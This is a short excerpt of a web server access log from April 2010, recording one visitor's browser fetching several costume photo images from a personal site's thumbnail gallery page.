94.241.129.62 - - [21/Apr/2010:06:42:41 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:42:45 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:43:11 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.241.129.62 - - [21/Apr/2010:06:43:15 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
